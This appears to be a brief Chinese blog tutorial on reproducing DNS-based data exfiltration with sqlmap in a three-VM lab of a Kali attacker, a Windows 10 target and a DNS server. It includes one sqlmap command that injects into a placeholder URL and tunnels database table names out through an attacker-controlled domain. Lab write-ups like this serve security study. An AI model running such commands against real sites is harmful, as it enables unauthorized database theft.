复现dns外带数据结合sqlmap

本文介绍了如何在实验环境中利用sqlmap工具结合dnslog进行SQL注入攻击的步骤。实验涉及三台虚拟机,分别作为kali攻击机、Windows10靶机和Windows2008R2 DNS服务器。通过配置DNS服务器和靶机的DNS设置,成功实现了DNS流量监听。然后使用sqlmap的特定命令进行注入测试,展示了SQL注入的基本流程和技术。

sqlmap结合dnslog
实验环境:

这里使用三台虚拟机,在公网是一样的效果
1.kali(使用sqlmap)      ip:192.168.31.40
2.windows10(靶机)       ip: 192.168.31.33
3.windows 2008 R2 ( 需要设置dns服务器)ip :192.168.31.35 
DNS服务器配置
dns服务器配置(ip为服务器所在主机的ip)

dns转换器配置(ip为kail的ip)

 

设置靶机的dns地址

IP为配置的dns地址

在靶机ping服务器,在kail上发现可以监听到 

开始sqlmap结合dnslog进行注入

命令格式:sqlmap -u "http://xx.xx.xx.xx/index.php?id=1" --technique=T --dns-domain "oupeng.top" -D security --tables
 

 

 

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值